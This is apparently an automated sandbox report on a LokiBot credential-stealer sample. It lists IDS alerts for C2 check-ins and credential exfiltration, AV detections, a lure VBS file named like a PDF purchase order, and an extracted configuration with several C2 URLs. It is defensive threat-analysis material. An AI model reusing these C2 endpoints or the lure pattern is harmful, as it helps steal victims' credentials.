Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:47.361321
SID:	2024318
Source Port:	49827
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:00.769505
SID:	2024313
Source Port:	49842
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:38.861510
SID:	2021641
Source Port:	49818
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:48.178974
SID:	2024318
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:21.735500
SID:	2024313
Source Port:	49794
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:45.799677
SID:	2024318
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:19.440133
SID:	2024318
Source Port:	49791
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:27.986411
SID:	2021641
Source Port:	49802
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:11.314149
SID:	2025381
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:31.298967
SID:	2025381
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:36.516498
SID:	2024318
Source Port:	49814
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:37.305241
SID:	2825766
Source Port:	49815
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:30.251229
SID:	2024313
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:10.080334
SID:	2024313
Source Port:	49855
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:11.610579
SID:	2025381
Source Port:	49857
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:01.546959
SID:	2021641
Source Port:	49843
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:59.690030
SID:	2024313
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:10.846749
SID:	2825766
Source Port:	49856
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:22.504191
SID:	2021641
Source Port:	49795
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:36.516498
SID:	2024313
Source Port:	49814
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:38.088060
SID:	2025381
Source Port:	49816
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:00.493399
SID:	2825766
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:59.690030
SID:	2024318
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:01.279270
SID:	2025381
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:10.080334
SID:	2024318
Source Port:	49855
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:30.251229
SID:	2024318
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://kbfvzoboss.bid/alien/fre.php	URL Reputation: Label: malware
Source: http://alphastand.win/alien/fre.php	URL Reputation: Label: malware
Source: http://alphastand.win/alien/fre.php	URL Reputation: Label: malware
Source: http://alphastand.trade/alien/fre.php	URL Reputation: Label: malware
Source: http://alphastand.top/alien/fre.php	URL Reputation: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\x.exe

Avira: detection malicious, Label: HEUR/AGEN.1362225

Found malware configuration

Source: 00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "https://altaskifer.sbs/PWS/fre.php"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\x.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\x.exe	Virustotal: Detection: 40%			Perma Link

Multi AV Scanner detection for submitted file

Source: #U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs	Virustotal: Detection: 21%			Perma Link
Source: #U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs	ReversingLabs: Detection: 31%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\x.exe

Joe Sandbox ML: detected

Source:	Binary string: aspnet_compiler.pdb source: 31437F.exe.4.dr
Source:	Binary string: GenPo.pdb source: wscript.exe, 00000000.00000003.2249190359.000001A4732E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2257758604.000001A474030000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2249613824.000001A473A21000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2257357620.000001A4739C2000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000000.2248791752.0000000000072000.00000002.00000001.01000000.00000006.sdmp, x.exe.0.dr
Source:	Binary string: BATMAN.pdb source: x.exe, 00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000002.00000002.2279959470.0000000004920000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 4_2_00403D74 FindFirstFileW,

4_2_00403D74

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	2_2_0070096C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	2_2_0495A160
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	2_2_0495AAA8
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	2_2_0495AEE8

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.6:49717 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49717 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49717 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.6:49717 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49717 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.6:49718 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49718 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49718 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.6:49718 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49718 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49719 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49719 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49719 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49719 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49719 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49720 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49720 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49720 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49720 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49720 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49721 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49721 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49721 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49721 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49721 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49722 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49722 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49722 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49722 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49722 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49723 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49723 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49723 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49723 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49723 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49724 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49724 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49724 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49724 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49724 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49725 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49725 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49725 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49725 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49725 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49727 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49727 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49727 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49727 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49727 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49728 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49728 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49728 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49728 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49728 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49729 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49729 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49729 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49729 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49729 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49731 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49731 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49731 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49731 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49731 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49734 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49734 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49734 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49734 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49734 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49737 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49737 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49737 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49737 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49737 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49739 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49739 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49739 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49739 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49739 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49740 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49740 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49740 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49740 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49740 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49741 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49741 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49741 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49741 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49741 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49742 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49742 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49742 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49742 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49742 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49743 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49743 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49743 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49743 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49743 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49744 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49744 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49744 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49744 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49744 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49745 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49745 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49745 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49745 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49745 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49746 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49746 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49746 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49746 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49746 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49747 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49747 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49747 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49747 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49747 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49748 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49748 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49748 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49748 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49748 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49749 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49749 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49749 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49749 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49749 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49750 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49750 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49750 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49750 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49750 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49751 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49751 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49751 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49751 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49751 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49752 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49752 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49752 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49752 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49752 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49753 -> 172.67.148.126:80
